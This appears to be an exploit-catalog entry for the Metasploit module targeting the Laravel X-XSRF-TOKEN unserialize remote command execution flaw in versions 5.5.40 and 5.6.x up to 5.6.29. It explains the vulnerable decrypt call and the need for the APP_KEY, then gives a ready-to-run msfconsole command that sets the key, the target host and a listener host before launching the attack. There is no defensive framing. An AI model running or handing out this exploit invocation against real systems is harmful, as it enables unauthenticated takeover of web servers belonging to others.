PHP Laravel



PHP Laravel Framework token Unserialize Remote Command Execution (2018-08-07)

This module exploits a vulnerability in the PHP Laravel Framework for versions 5.5.40, 5.6.x <= 5.6.29.
Remote Command Execution is possible via a correctly formatted HTTP X-XSRF-TOKEN header, due to
an insecure unserialize call of the decrypt method in Illuminate/Encryption/Encrypter.php.
Authentication is not required, however exploitation requires knowledge of the Laravel APP_KEY.
Similar vulnerabilities appear to exist within Laravel cookie tokens based on the code fix.
In some cases the APP_KEY is leaked which allows for discovery and exploitation



msfconsole -x '
use exploit/unix/http/laravel_token_unserialize_exec ;
set APP_KEY dBLU...Fj0= ;
set VHOST ;
set RHOSTS ;
set LHOST ;
run ;